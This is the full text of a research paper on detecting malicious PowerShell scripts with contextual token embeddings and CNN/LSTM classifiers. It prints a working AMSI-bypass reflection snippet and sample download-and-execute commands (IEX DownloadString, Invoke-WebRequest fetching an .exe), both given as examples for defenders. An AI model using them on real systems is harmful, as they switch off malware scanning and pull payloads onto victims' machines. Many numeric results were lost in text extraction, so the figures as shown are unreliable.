Detecting Malicious PowerShell Scripts Using Contextual Embeddings

05/23/2019 ∙ by Amir Rubin, et al. ∙ Microsoft Ben-Gurion University of the Negev 0

PowerShell is a command line shell, that is widely used in organizations for configuration management and task automation. Unfortunately, PowerShell is also increasingly used by cybercriminals for launching cyber attacks against organizations, mainly because it is pre-installed on Windows machines and it exposes strong functionality that may be leveraged by attackers. This makes the problem of detecting malicious PowerShell scripts both urgent and challenging. We address this important problem by presenting several novel deep learning based detectors of malicious PowerShell scripts. Our best model obtains a true positive rate of nearly 90 than 0.1 Our models employ pre-trained contextual embeddings of words from the PowerShell "language". A contextual word embedding is able to project semantically similar words to proximate vectors in the embedding space. A known problem in the cybersecurity domain is that labeled data is relatively scarce in comparison with unlabeled data, making it difficult to devise effective supervised detection of malicious activity of many types. This is also the case with PowerShell scripts. Our work shows that this problem can be largely mitigated by learning a pre-trained contextual embedding based on unlabeled data. We trained our models' embedding layer using a scripts dataset that was enriched by a large corpus of unlabeled PowerShell scripts collected from public repositories. As established by our performance analysis, the use of unlabeled data for the embedding significantly improved the performance of our detectors. We estimate that the usage of pre-trained contextual embeddings based on unlabeled data for improved classification accuracy will find additional applications in the cybersecurity domain.

READ FULL TEXT VIEW PDF
POST COMMENT

Comments

There are no comments yet.

Authors

page 1

page 2

page 6

This week in AI

Get the week's most popular data science and artificial intelligence research sent straight to your inbox every Saturday.

I Introduction

Cybercrime in its various forms poses a serious threat to the modern digital society. In the ever-going race of cyber arms, attackers frequently rely on tools already existing on the victim’s system, a technique known as ”Living of the Land”. These methods have become increasingly popular in recent years [1]. Several reports by security companies observe the popularity in cyber attacks of using PowerShell [2, 3, 4], a scripting shell normally used in organizations for configuration management and task automation. PowerShell can be used in different stages of an attack, either by a human attacker or by malicious software, to perform various malicious activities such as reconnaissance, gaining persistence in the attacked system, communicating with a command and control server or fetching a payload. The volume and diversity of PowerShell usage in malicious activities make it an important attack vector to be addressed by defenders.

To facilitate better defence against script-based attacks on Windows systems, Microsoft released the Antimalware Scan Interface (AMSI111https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-portal

). This programming interface provides the defending systems with the capability to inspect the code executed by scripting engines (such as PowerShell, JavaScript and VB Script). While it gives defenders important optics into the scripts executed on the system, the AMSI interface by itself does not provide a solution against PowerShell-based malicious cyber activities. Moreover, the widespread and diverse usage of PowerShell scripting by legitimate users, such as network administrators and software developers, imposes a requirement for a very low false positive (FP) rate by defending systems. The importance and the challenging nature of defending against PowerShell-based attacks create a strong need for devising advanced machine learning (ML) techniques that can be applied to this problem. Such techniques should aim not only at extracting patterns of malicious code, but also for capturing the semantics discerning malicious and benign usage of PowerShell.

Recent scientific achievements in Deep Learning (DL) [5, 6, 7] provide many opportunities for the development of novel methods for efficient cyber defense. One of the major breakthroughs in DL is associated with the usage of contextual embeddings

in various Natural Language Processing (NLP) tasks. Several methods for embedding words into vectors have been proposed in recent years

[8, 9, 10, 11]

. Generally, these methods leverage large datasets of text documents (such as Wikipedia articles) to obtain representations of words as vectors in the Euclidean space from contexts of their appearances in the document corpus. These embedding methods have gained popularity over traditional one-hot encoding in various NLP tasks, because of their ability to project semantically similar words to proximate vectors in the embedding space. Pretrained embeddings can be used to initialize the first layer of a neural network trained to perform a particular task (for example classification of documents to topics), thereby reducing the volume of data required for training.

As a viable alternative to the word embedding approach, several authors suggest to encode as a sequence of vectors representing characters [12, 13]. Promising results for the application of DL methods to the classification of PowerShell command-lines (as opposed to general scripts) using such a character-level approach were reported in [14]

. We note, however, that the problem of classifying general PowerShell scripts is different and significantly harder, since scripts are typically much longer than command-lines and their structure is generally much more complex, often including user-defined functions and references to external modules.

In this work, we propose a novel method for the classification (to benign or malicious) of PowerShells scripts. We aim to depart from traditional pattern recognition approaches and to provide a classification method for PowerShell scripts that is more resilient to evasion attempts by malicious attackers. To this end, we experiment with two popular text embedding approaches, Word2Vec (W2V)

[8] and FastText ([15, 16]), trained on a dataset that contains a large corpus of unlabeled PowerShell scripts.222We thank Lee Holmes for making this dataset available to us.

We use the following two datasets. The unlabeled dataset is a corpus of 368K distinct unlabeled PowerShell scripts and modules333We explain the difference between the notions of a module and a script in Section II. collected from GitHub444https://github.com/ and PowerShell Gallery555https://www.powershellgallery.com/ public repositories. The second, smaller, dataset is the labeled dataset consisting of benign PowerShell scripts and malicious PowerShell scripts, partitioned to a train set and a test set (collected over different periods of time).

The high-level structure of our model generation process is presented in Figure 1. Our method trains the detection model using two stages. During the first stage, we use the unlabeled dataset and the train set666Labels are not used for learning contextual embeddings. to obtain a contextual embedding of PowerShell tokens. We provide examples demonstrating interesting semantic relationships captured by this embedding. During the second stage, we employ the embedding as a first layer for token inputs in a deep neural network trained (using the labeled scripts of the train set) to detect malicious PowerShell scripts. Our best model employs an architecture comprised from both character-level one-hot encoded input and a token-level embedding layer (pretrained using FastText), followed by several layers of CNN [17, 18] and LSTM-RNN [19] neural network units.

We use the labeled dataset for supervised training and for performing an extensive performance evaluation of different DL and traditional (such as logistic regression

[20]

) ML classification methods. The evaluation results we present establish that our new approach outperforms both traditional methods (based on features such as character-level and word-level n-grams and bag of words) and deep models that do not use pretrained embeddings, but rather generate an embedding as part of the training process for the classification task. Moreover, we obtain even better results by combining both a token-level embedding layer and character-level one-hot encoding into a single neural network. This architecture improves over the results of traditional ML classifiers by 22 percentage points (pp) and by 11pp over the results of deep learning models that do not employ pre-trained embeddings, achieving recall of 89.4% on the test set while maintaining a low FP rate of 0.1%.

Contribution

To the best of our knowledge, our work is the first to address the important problem of detecting malicious PowerShell scripts. We present a novel DL-based detector of malicious PowerShell scripts that leverages a pre-trained contextual embedding. We conduct extensive evaluation comparing the performance of our detector with those of several alternative detection models. Our evaluation results establish that our detector significantly outperforms DL-based detectors that do not use a pre-trained embedding as well as traditional-ML-based detectors and is able to detect nearly 90% of malicious PowerShell scripts while maintaining an FP rate of only 0.1% on a test set collected over a different period of time than the train set.

Fig. 1: High-level structure of our model generation process.

A second, more general, key contribution made by this work is to demonstrate the power of contextual embedding methods in the cybersecurity domain. To the best of our knowledge, our work presents the first detector of malicious scripts that leverages a contextual embedding learnt using unlabeled data for increasing detection accuracy. The fact that embeddings based on unlabeled data can be used for enhancing the detection performance of supervised classification tasks is important, since unlabeled data are frequently available in abundance to the cyber defenders, whereas labeled data is typically more scarce and difficult to obtain. Since our approach is generic, it can be adapted for the classification of scripts in other languages as well as to other types of textual data that arise in cyberspace. We therefore expect that the usage of pre-trained contextual embeddings based on unlabeled data for improved supervised classification accuracy will find additional applications in the cybersecurity domain.

Our third contribution is that we show that models that combine character-level and token-level representations of scripts are able to provide performance that is superior to that of models that employ only a single type of representation.

The rest of this paper is organized as follows. In Section II, we provide required background on PowerShell, the AMSI programming interface, deep learning and contextual embeddings. Section III describes the datasets we use and the manner in which they are pre-processed. This is followed by a discussion of the contextual embedding of PowerShell tokens in Section IV. We describe the detection models we implemented in Section V and report on the results of our experimental evaluation in Section VI. Related work is surveyed in Section VII. Section VIII concludes with a short discussion of our results and avenues for future work.

Ii Background

Ii-a PowerShell

First released in 2006, PowerShell is a command line shell, widely used in organizations for configuration management and task automation. It has a powerful scripting language with various capabilities, accessible through cmdlets. These cmdlets are functional units, exposing system administration capabilities such as registry or file system access and general purpose utilities like a web client or text encoding utilities. For example, the Get-ItemProperty cmdlet reads values from the Windows registry. A PowerShell script is a sequence of PowerShell cmdlets that can be executed directly from the command line, or stored as a .ps1 file. Functional units of PowerShell may be combined into a single PowerShell module (.psm1 file), making the code easier to manage, reference, load or share.

PowerShell as an attack vector

Given the ease of access to system resources using PowerShell, the fact that it is pre-installed on Windows machines, the huge number of cmdlets available and the many ways in which PowerShell code can be obfuscated [14], PowerShell is a tool of choice for malware authors to achieve their goals. From reconnaissance via port scanning, through privilege escalation using shell-code injection [2] and gaining persistence using registry editing777http://az4n6.blogspot.com/2018/06/malicious-powershell-in-registry.html to payload dropping using a web client[4], PowerShell can serve as a fileless attack vector, enabling the attacker to leave minimal traces on a compromised machine.

Indeed, several recently-published reports discuss the growing popularity of PowerShell’s usage as an attack vector and analyze the various techniques by which this is done [3, 2, 4, 21]. A recent report by IBM ([21]) observes that over 57% of the attacks they analyzed were fileless, and many of these used PowerShell as an attack vector. This highlights the importance of detecting malicious PowerShell code.

Ii-B Anti-Malware Scan Interface (AMSI)

In 2015, Microsoft announced a new capability built into Windows 10, called the Anti-Malware Scan Interface (AMSI)888https://docs.microsoft.com/en-us/windows/desktop/amsi/antimalware-scan-interface-portal, enabling applications to request an anti-malware scan by the anti-malware installed on the machine. By default, PowerShell code is sent via AMSI for anti-malware scanning prior to its execution. The labeled dataset we use in this work (described in more detail in section III) consists of real-world PowerShell scripts collected using AMSI, which we briefly describe now.

As surveyed in the past (see [3, 2, 4]), PowerShell code can be obfuscated using numerous techniques, which is often done by malicious code for evading detection. More specifically, PowerShell code may be deeply obfuscated by iteratively applying obfuscation mechanisms multiple times, thus wrapping the original code in several obfuscation layers. Scripts are submitted to the anti-malware product by AMSI just before the de-obfuscated code is presented to the host for execution. This means that AMSI’s output often provides much more visibility into the PowerShell code about to be executed than is available from direct analysis of the possibly-obfuscated content of PowerShell scripts.

Specifically, any value supplied to the Invoke-Expression cmdlet will be fully uncloaked by AMSI. For example, when executing the PowerShell command Invoke-Expression $env:var, the value of the environment variable $env:var is sent by AMSI to be evaluated before execution and is thus output by it.

Nevertheless, there are also cases in which AMSI’s output is not fully de-obfuscated and is dynamicaly resolved to plain code only during execution. This may occur, e.g., when the PowerShell code uses an expression that applies a string manipulation technique (such as string concatenation) as a method parameter or when a method name is composed of characters with alternating casing.

Several techniques for evading AMSI are known and samples of such evasion attempts were observed in our dataset. For instance, the following code sets the value of the AmsiInitFailed property to true999https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/:

[Ref].Assembly
.GetType(’System.Management.Automation.AmsiUtils’)
.GetField(’amsiInitFailed’,’NonPublic,Static’)
.SetValue($null,$true);

The above PowerShell code snippet is an example of an evasion technique that uses .NET’s reflection mechanism to set the value of the private static property AmsiInitFailed in the AmsiUtils class to true, thus preventing the ScanContent method (not shown in the above code) from sending any content to the anti-malware engine for scanning. Attempts to disable AMSI can be considered as malicious activity, which can be detected by pin-point detectors dedicated to this task , as done by several popular anti-malware vendors 101010 Microsoft Defender ATP , VirusTotal scan of AMSI bypass script We consider the development of such detectors as beyond the scope of this work.

By collecting real-world PowerShell scripts using AMSI rather than directly from a command-line shell, we leverage AMSI’s enhanced logging and de-obfuscation capabilities, allowing better visibility into the executed code of PowerShell scripts.

Ii-C Deep Learning

In this section, we provide background on deep learning concepts and architectures that is required for understanding the deep learning based malicious PowerShell scripts detectors that we present in subsection V-A.

Artificial Neural Networks (ANNs) [22, 23, 24] are a family of machine learning models, composed of a collection of layers. A typical ANN is composed of one or more input layers, a single output layer, and one or more hidden layers. A Deep Neural Network (DNN) has multiple hidden layers. There are several key DNN architectures. In what follows, we briefly describe the architectures used by our detectors.

Ii-C1 Convolutional Neural Networks (CNNs)

A CNN is a learning architecture, traditionally used in computer vision

[17, 18]. As its name implies, the main component of a CNN is a convolutional layer. For instance, given a 2D grey scale image, a convolutional layer uses 2D “filters” (or “kernels”) of size , for some integers and . As the filter is sliding over the 2D input matrix, the dot product between its weights and the corresponding window in the input is being computed. Intuitively, the filter slides over the input in order to search for the occurrences of some feature or pattern. The weights used in the filters are being learnt during the training process.

Two additional layer types often used by CNNs (as well as by the RNN architecture we describe below) are the max pooling and dropout layers. A

max pooling layer [25]

“down-samples” neurons in order to generalize and reduce dimensionality and overfitting

[26]. It applies a (for some integers and ) window across the input, and outputs the maximum value within the window, thus reducing the number of parameters. A global max pooling layer is a special case of max pooling, where the size of the pooling window equals the size of the input feature map. Intuitively, when using a global max pooling layer on top of a convolutional layer, each filter is mapped to a single neuron, indicating if the feature detected by this filter appears anywhere in the input.

Dropout layers [27]

can be used in between layers, to reduce overfitting by randomly ”dropping” some of the inputs. Each node in the layer’s input is being output by the dropout layer with probability

or is “dropped out” (thus becoming disconnected from the next layer) with probability .

Ii-C2 Recurrent Neural Networks (RNNs)

RNNs are neural networks able to process sequences of input representing data series such as text [28, 29], speech [30, 31, 32], handwriting [33] or video [34] in a recurrent manner, that is, by repeatedly using the input seen so far in order to process new input. We use an RNN network composed of long short-term memory (LSTM) blocks [19]. Each such block consists of a cell that stores a hidden state, able to aggregate/summarize inputs received over an extended period of time. In addition to the cell, there are three other parameters (referred to as gates) in an LSTM block. They control and regulate information flow into and out of the cell. Roughly speaking, the input gate determines the extent to which new input is used by the cell, the forget gate determines the extent to which the cell retains memory, and the output gate controls the level to which the cell’s value is used to compute the block’s output. A bidirectional RNN (BDRNN) network [35]

is an RNN architecture in which two RNN layers are connected to the output, one reading the input in order and the other reading it in reverse order. Intuitively, this allows the output to be computed based on information from both past and future states. For instance, in the context of the sentiment analysis problem, when processing text from the middle of a sentence, text seen in the beginning of the sentence, as well as text seen at the end the sentence, may be used by the computation.

Ii-D Contextual Embeddings

In the context of text analysis, a common practice is to add an embedding layer before the CNN or the RNN layer [36, 37, 38]. Embedding layers serve two purposes. First, they reduce the dimensionality of the input. Second, as done by our detectors, they can be used to represent the input in a manner that retains its context. The embedding layer converts the input (typically at the token level, but sometimes also at the character level, depending on the problem at hand) to a sequence of vectors. Embedding techniques are designed to embed tokens in an n-dimensional space (for an appropriately-selected n) by representing them as n-dimensional vectors.

Our detectors employ the widely-used Word2Vec (W2V) [8] and FastText [15, 16] contextual embedding algorithms, which use an ML model for learning the vector representation of tokens. In both algorithms, the underlying architecture of the model contains an input layer, a hidden layer of (appropriately selected) size n, and an output layer. Depending on the training method (”CBOW” or ”skip-gram” [39]), we either try to predict a token based on its context (i.e. the tokens surrounding it), as done in CBOW, or to predict the context based on a given token, as done in skip-gram.

Following the learning phase, a sequence of values is stored in the hidden layer per every token in the corpus. These values serve as the vector representation of the token. The key difference between the two algorithms is the following. Whereas Word2Vec only embeds the tokens as atomic units, FastText also embeds character n-grams (sub-tokens) extracted from these tokens. Specifically, each token is represented by the sum of the vector representations of the token itself and its n-grams (our implementations use n-grams for ). This representation implies that FastText is able to leverage the sub-tokens comprising each token. Specifically, this allows it to embed tokens that were not seen during the training stage (but may be input to the model once it is deployed), as they or their sub-tokens appeared as sub-tokens in the corpus used to train the embedding.

Iii Datasets and Pre-Processing

We use two datasets: An unlabeled dataset and a labeled dataset. The unlabeled dataset consists of approx. 368K unlabeled PowerShell scripts and modules (*.ps1 and *.psm1 files) collected from public repositories including GitHub111111https://github.com/ and PowerShellGallery121212https://www.powershellgallery.com/.

The labeled dataset was collected and labeled inside our organization. In order to accomplish this, we used the capabilities provided by the AntiMalware Scan Interface (AMSI) (see Section II). Using AMSI, we were able to collect PowerShell scripts and modules, as their content is sent to security analysis prior to their execution.

Our labeled dataset is composed of scripts131313For presentation simplicity, we refer to all PowerShell code recorded by AMSI as scripts, regardless of whether these are scripts or modules.. It contains distinct malicious scripts, obtained by executing known malicious programs inside a sandbox and recording all their PowerShell activity via AMSI. It also contains a collection of distinct benign (or clean) PowerShell scripts (also recorded via AMSI). Unlike malicious scripts, benign scripts were executed on regular machines within our organization rather than inside a sandbox. Only scripts that were executed exclusively on machines with no indication of malicious activity 30 days prior to data collection were labeled as benign.

The following subtle point regarding the dataset labeling process should be emphasized. When AMSI is used for monitoring the execution of a program, the PowerShell code it executes is reported in its entirety. Consequently, when a malicious script uses benign modules (which is often the case), the benign module’s code is reported by AMSI as well. In order not to label such benign modules as malicious, we label a script/module as malicious only if it was seen exclusively in malicious contexts, that is, only if it was never observed on clean machines.

Iii-a Data Preprocessing

We have carefully pre-processed the scripts we collected in order to normalize the PowerShell code observed, by regularizing digits and random values, for improving detection and evaluation results. Digits were replaced with asterisk signs (‘*’) in order to better deal with random values, IP addresses, random domain names (which in many cases contain digits), dates, version numbers, etc. Labeled code was preprocessed also for eliminating identical (or nearly-identical) scripts (a process that we call data de-duplication) in order to reduce the probability of data leakage [40], as we explain next.

Iii-B Deduplicating Data

As we use cross-validation to evaluate the performance of our detection models on labeled data, we took extra care to reduce the probability of data leakage. In our setting, a data leakage problem may result from using identical (or nearly-identical) scripts for training the model and for validating it. Indeed, we observed in our dataset PowerShell scripts that differ by only a small number of characters. In most of these cases, the difference stemmed from the usage of random file names, different IP addresses, or different numbers/types of white space characters (for example spaces, tabs and newlines).

The existence of identical or nearly-identical scripts in a PowerShell scripts-corpus collected inside a real-world organization is almost certain. Many of the benign scripts observed on machines inside the organization run as part of corporate maintenance procedures and are therefore likely to be observed on many machines and/or on the same machine in different times. As for malicious scripts, since we executed (inside a sandbox) numerous malicious executables in order to collect the PowerShell code they invoke, some subsets of these programs may have belonged to the same malware family, and thus invoked similar or even identical PowerShell code. Moreover, almost-identical scripts can also be used by programs from different malware families that launch similar types of cyber attacks.

To prevent data leakage, we perform a de-duplication process for eliminating identical or nearly-identical scripts from our dataset. A toy example of this process, explained next, is depicted in Figure 2, assuming it is applied to the following three (artificial) single-command scripts:

  1. IEX(New-Object Net.WebClient).DownloadString(’https://domain/a**bc*.txt’));

  2. IEX(New-Object Net.WebClient).DownloadString(’https://domain/d*e*f.txt’));

  3. Invoke-WebRequest -Uri ’https://domain/gh**i*.exe’ -OutFile ’C:\gh**i*.exe’

The de-duplication process consists of the following 4 stages:

Fig. 2: An example of the scripts de-duplication process.
  1. Script tokenization
    Scripts are demarcated to tokens. Any symbol which is not in the set {’a’-’z’, ’A’-’Z’, ’*’, ’$’, ’-’} is used as a delimiter. We remind the reader that digits are replaced by asterisk signs (’*’) during the regularization process, hence they are not used as delimiters.

    We do not use the dollar sign (’$’) as a delimiter because it is used in PowerShell to refer to a variable. Thus, for example, we consider true and $true as two different tokens. As for the dash sign(’-’), it appears inside PowerShell tokens such as Write-Host and Invoke-Command and is therefore not used as a delimiter as well. We only use tokens of length at least 2, since a single character by itself has no meaning in PowerShell. The tokenization process yielded four million distinct tokens. Since PowerShell is case-insensitive, all tokens were normalized to the lower case.

  2. Rare tokens elimination
    Since our goal is to deduplicate similar scripts based on the tokens contained in them, we remove random-string tokens by keeping only tokens that appear in more than 100 scripts. To motivate the selection of 100 as the token frequency threshold, Figure 3 presents a histogram (in a log-log scale) of the number of tokens that appear in exactly x distinct scripts, for each value x. Note the change in trend around (512 scripts), indicating that many tokens appear in less than about scripts, and substantially less tokens appear in over scripts. To ensure that we do not remove too many tokens, we used 100 as a threshold for a token to be considered significant. This resulted in a collection of 14,216 significant tokens. We note that rare tokens are removed only for the sake of de-duplication. In general, such tokens are still used for training the embedding layer.

    Fig. 3: Number of tokens appearing in x scripts, on a log-log scale. The vertical line is at .
  3. Scripts clustering
    By identifying each script according to the set of the significant tokens that appear in it, we effectively cluster together all scripts that differ only in the rare tokens they contain.

  4. Cluster representatives selection
    We arbitrarily select from each of the resulting script clusters a single representative script. This process yielded distinct scripts.

We note that the dimensions of the dataset specified earlier are the numbers of distinct scripts after the de-duplication process.

As shown by Table I, the de-duplication process reduced the number of labeled instances from to , a 41% reduction.

Original Distinct % Deduped
Clean scripts 41%
Malicious scripts 44%
Total scripts 41%
TABLE I: De-Duplicated Scripts Statistics

Iv Contextual embedding of PowerShell tokens

We remind the reader that our training approach, illustrated by Figure 1, consists of an embedding stage followed by a supervised training stage. We learn the contextual embedding using both the unlabeled dataset (consisting of 368K distinct PowerShell scripts and modules collected from public repositories) and the train set (consisting of 106,840 labeled Powershell scripts).141414The test set is not used for learning the embedding.

In this section, we briefly describe the techniques we used to embed tokens from the PowerShell corpus in an -dimensional vector space and share some interesting findings derived from these embeddings, showcasing their potential contribution for detection. We experimented with two DL-based text embedding techniques – W2V and FastText (see Section II-D). In both cases, the input for the embedding is the same: we tokenized the scripts as described above.

The scripts we use to generate the embedding contain approximately four million distinct tokens, most of which appear in only a few scripts. Using all these tokens would generate a huge embedding layer, making the processing time of both learning the embedding and training the model impractically large. Consequently, only tokens that appeared in at least ten scripts were used for embedding. This resulted in 81,111 distinct tokens.

We chose to use the CBOW rather than the Skip-Gram architecture [39], since the former is faster to train and generally works better on large training sets with many frequent words.

Iv-a Tokens embedding in action

W2V embedding is known for capturing semantic similarities between different words, which are frequently preserved in linear combinations of embedded vectors [8]. In this subsection, we share a few interesting examples to illustrate the potential of the representations of tokens used in PowerShell scripts. These examples demonstrate how different tokens representing similar semantics in PowerShell code are embedded as neighboring vectors. Using t-SNE [41] for reducing dimensionality, in Figure 4 we present a 2-dimensional visualization of the vector representation (using W2V) of 5,000 randomly selected tokens and some interesting tokens which we highlighted. Note how semantically similar tokens are placed near each other. For example, the vectors representing -eq, -ne and -gt, which in PowerShell are aliases for “equal”, “not-equal” and “greater-than”, respectively, are clustered together. Similarly, the vectors representing the allSigned, remoteSigned, bypass and unrestricted tokens, all of which are valid values for the execution policy setting in PowerShell, are clustered together as well.

Fig. 4: t-SNE 2D visualization of 5,000 tokens using W2V.

Examining the vector representations of the tokens, we found a few additional interesting relationships between the tokens, which we describe next.

Tokens similarity

Using the W2V vector representation of tokens we can use the Euclidean distance to measure similarity in the embedding space. Many cmdlets in PowerShell have an alias. We found that using the W2V embedding, in many cases, the token closest to a given cmdlet is its alias. For example, the representations of the token Invoke-Expression and its alias IEX are closest to each other. Two additional examples of this phenomenon are the Invoke-WebRequest and its alias IWR, and the Get-ChildItem command and its alias GCI.

We also measured distances within sets of several tokens. Consider, for example, the four tokens $i, $j, $k and $true (see the right side of Figure 5). The first three are usually used to represent a numeric variable and the last naturally represent a boolean constant. As expected, the $true token mismatched the others – it was the farthest (using the Euclidean distance) from the center of mass of the group.

More specific to the semantics of PowerShell and cybersecurity, we checked the representations of the tokens: bypass, normal, minimized, maximized and hidden (see the left side of Figure 5). While the first token is a legal value for the ExecutionPolicy flag in PowerShell, the rest are legal values for the WindowStyle flag. As expected, the vector representation of bypass was the farthest from the center of mass of the vectors representing all other four tokens.

(a)
(b)
Fig. 5: t-SNE 3D visualization of selected tokens.

Linear Relationships

As W2V preserves linear relationships, computing linear combinations of the W2V vector representation results in semantically-meaningful results. Below are a few interesting relationships we found: high - $false + $true   low
‘-eq’ - $false + $true   ‘-neq’ DownloadFile - $destfile + $str   DownloadString
‘Export-CSV’ - $csv + $html   ‘ConvertTo-html’
‘Get-Process’-$processes+$services   ‘Get-Service’

In each of the above expressions, the sign signifies that the vector on the right side is the closest (among all the vectors representing tokens in the vocabulary) to the vector that is the result of the computation on the left side, in terms of Euclidean distance.

V Classification Models

In this section, we describe the detection models we implemented and evaluated. We report on our evaluation results in Section VI.

Fig. 6: A diagram of the ”Token-Char” model architecture. The result of applying global max pooling on the character-level input is marked in blue, to emphasise the fact that it has been duplicated in order for it to be processed by the LSTM layer along with the token-level input.

We implemented and evaluated 10 deep learning detection models, which differ in their architectures and in terms of whether their input is processed as a sequence of tokens, a sequence of characters, or both. In order to assess the extent to which the DL models are able to compete with traditional detection approaches, we also implemented two detectors that are based on widely-used traditional methods for feature extraction. We proceed with the details.

V-a Deep-Learning Based Detectors

We employ two deep-learning based architectures – a Convolutional-Neural-Network (CNN) and a combination of CNN and a Recurrent-Neural-Network (CNN-RNN).

V-A1 Token-Level Architectures

We refer to DL architectures that consider their input as a sequence of tokens as token-level architectures. We implemented two token-level architectures: One based on the CNN-RNN architecture of [42] and another based on the CNN architecture presented by [43, 44].

In both these architectures, on top of the embedding layer, we used a convolutional layer with 128 filters and a kernel of size 3. In the CNN architecture, we then performed global max pooling, followed by a dropout layer (see Section II-C). In the CNN-RNN architecture, on top of the convolutional layer, we used a max pooling layer of size

, to preserve the sequential nature of PowerShell scripts, followed by a bidirectional LSTM layer with 32 units, a dropout of 0.5 and a recurrent dropout of 0.02. Finally, in both architectures we used a single-node dense layer with a Sigmoid activation function for classification. For full details, we provide our Keras

[45] code for model definitions in the Appendix.

As previously mentioned, the first layer of both our DL architectures is an embedding layer. We experimented with the following three options for setting the initial weights in the embedding layer, for a total of 6 different token-based DL detection models:

  • Weights sampled from a uniform distribution: The two resulting models are henceforth referred to as ”CNN” and ”CNN-RNN”. We sometimes refer to this option as

    inline embedding.

  • Weights pretrained using W2V: The two resulting models are henceforth referred to as ”CNN-W2V” and ”CNN-RNN-W2V”.

  • Weights pretrained using FastText: The two resulting models are henceforth referred to as ”CNN-FastText” and ”CNN-RNN-FastText”.

In both training and prediction, we used the first 2,000 tokens from each PowerShell script, as only 3 clean scripts (and no malicious script) in our labeled dataset contain more than 2,000 tokens. Figure 7 presents the histogram of script lengths (in terms of tokens), separately per label, on a log scale. The distributions of clean and malicious scripts are similar, and both reach almost the same maximum length.

Fig. 7: Histogram of number of tokens per script (by label), y-axis uses logarithmic scale.

V-A2 Character-Level Architecture

Another model we experimented with is the one described in [14]

, henceforth referred to as ”Char-CNN”, where character-level one-hot encoding is used. It employs a 4-layer CNN architecture, containing a single convolutional layer with 128 kernels of size 62x3 and stride 1, followed by a max pooling layer of size 3 with no overlap. This is followed by two fully-connected layers, both of size 1,024 – each followed by a dropout layer with probability of 0.5, and an output layer.

V-A3 Token-Character Level Architecture

The 7 models we described so far use either a character-level or a token-level representation, but not both. In order to combine both a token-level and a character-level representation, we implemented and evaluated an architecture similar to the CNN-RNN one, that uses both a one-hot encoding representation of characters and a token-level embedding layer. We henceforth refer to this architecture as ”Token-Char”151515We would like to thank Eran Galili from Microsoft for his help with the architecture design and technical assistance.. Here, too, we experimented with the three token embedding options (inline, W2V and FastText), resulting in 3 additional DL detection models.

The use of two input representations requires applying additional adaptations to the architecture, as otherwise it would result in a model that has too many trainable parameters, thus increasing the risk of overfitting. In order to address this issue, we reduced the number of input script-tokens and script-characters to 1,000 and also reduced the number of filters used in the convolutional layer from 128 to 64. We also reduced the number of tokens participating in the embedding process by using only tokens that appear in at least 20 scripts (instead of 10); this reduced the number of tokens to 47,555 tokens.

Figure 6

depicts the ”Token-Char” architecture. As can be seen, it receives both a token-level and a character-level representation of the input script. After the tokens are embedded and the characters are encoded, each is being input to a separate convolution layer with 64 filters. Next, for the token-level path, we performed max pooling with a kernel of size 3 (as was done in the CNN-RNN architecture). As for the character-level path, we used global max pooling, which resulted in a single tensor of size 64 (the number of filters used in the previous convolutional layer). We added a dropout layer with probability 0.5 for regularization (not shown in Figure 

6).

We now explain how we combined the paths of the token-level and the character-level inputs. Since we use global max pooling for the character convolutional layer, we had to duplicate the resulting tensor before we concatenate it to the output of the token-level layer. This allows us to apply the bi-directional LSTM on an input that is based on both the token-level embedding and the character-level encoding. In each of the 332 LSTM input entries, the top 64 represent token-level features and the bottom 64 represents character-level features. Note that, as we did not apply global max pooling to the token-level path, the token-level sequential nature of the scripts is maintained. We use a biderctional LSTM layer with output size of 32 and, finally, an output layer consisting of a single node. Full technical details are provided in the appendix.

V-B Traditional NLP-based detectors

We used two types of NLP feature extraction methods: character-level -grams and token-level -grams. For character-level features, we used character -grams for . For token-level features, we used token -grams, for . We only used tokens appearing in at least 10 scripts. For both methods, we evaluated both term-frequency (tf) and term-frequency-inverse-document-frequency (tf-idf) as a weighting factor and then applied a logistic regression classifier on the extracted features (more details are provided in the appendix). For each type of features (token-based or character-based), we report on the evaluation results of the best-performing model (optimal value of ), using tf-idf, as it gave the best results in terms of true positive rate (TPR, a.k.a. recall) when using a threshold keeping the false positive rate (FPR) lower than .

Vi Experimental Evaluation

In this section, we describe how we evaluated our detectors. We then present and discuss evaluation results. This is followed by an analysis of the contribution of contextual embedding and a discussion of the added value of the character-level representation.

We have split our labeled dataset according to scripts’ collection times to a test set, consisting of scripts (of which are malicious and of which are clean), and a train set, consisting of scripts (malicious and clean), on which our models were trained and evaluated using cross-validation. In terms of time-period, the train set includes scripts seen during May-July 2018, while the test set includes scripts seen during August-October 2018.

We performed a 3-fold cross-validation on the train set to select values for hyper-parameters such as the size of the kernel of the convolutional layer, the number of filters to use, the size of the LSTM layer, etc. Cross-validation was used also for selecting the number of training epochs to be used, as follows: For each fold, we selected the model that is generated in the epoch in which we obtained the highest TPR on the validation set (with an FPR lower than

). As for performance evaluation on the test set – since the above procedure generates 3 models for each detector (one per fold), we apply all three to the test set and use their average score. We used this technique, discussed in [46], in order to avoid overfitting that may result from using too many training epochs.

Vi-a AUC results

For the traditional NLP models, we present the results of the models that performed the best. These are the character-level using tri-grams (Char-3-gram) and token-level using bi-grams (Token-2-gram), both using tf-idf for feature weighting. First, we focus on the area under the ROC curve (AUC) on the validation set, presented in the AUC column in Table II.

As evident from Table II, all detectors obtain very high AUC levels, above . At first glance, this may lead one to conclude that they all provide sufficiently good performance. However, considering that in real-world deployments the rate of PowerShell scripts to be classified by our models may be very high, even a low FPR of 1% will result in too many false alarms that would deem the detection system impractical. Thus, for a detector to be useful, it must maintain a very low FPR. Consequently, in what follows we evaluate the TPR of the detectors while enforcing very low FPR levels.

Vi-B TPR results

Columns ’Train’, ’Validate’ and ’Test’ in Table II present the TPR of our detectors for FPR level , over the train, validation and test sets. In general, when conducting cross-validation on the train set, results are reported only for the validation fold. We choose to report also on the performance of our models on the train folds (in the column with heading ’Train’), since this allows us to better analyze the extent to which different models suffer from overfitting.

As already mentioned, we conduct the analysis at an FPR level of . Since we have a total of about 28,000 clean scripts in each train set fold, using this threshold translates to at most 28 FPs in each fold.

The TPR scores presented for the train and validation sets in Table II are based on the average of the scores for the three folds. As mentioned above, for each train set fold used for validation, we select the model that provides the highest TPR (over the epochs) on this fold, while keeping the FPR low. This yields three detection models applied to each test set script, resulting in three scores. The results presented in the ’Test’ column of table II are based on the average of the scores of these three models. We use this technique for ensuring that we apply the best model, as each epoch results in a different model, and after a certain number of epochs the models starts to overfit.

Model AUC Train Validation Test
Token-Char-FastText 0.994 0.949 0.929 0.894
Token-Char-W2v 0.995 0.972 0.922 0.810
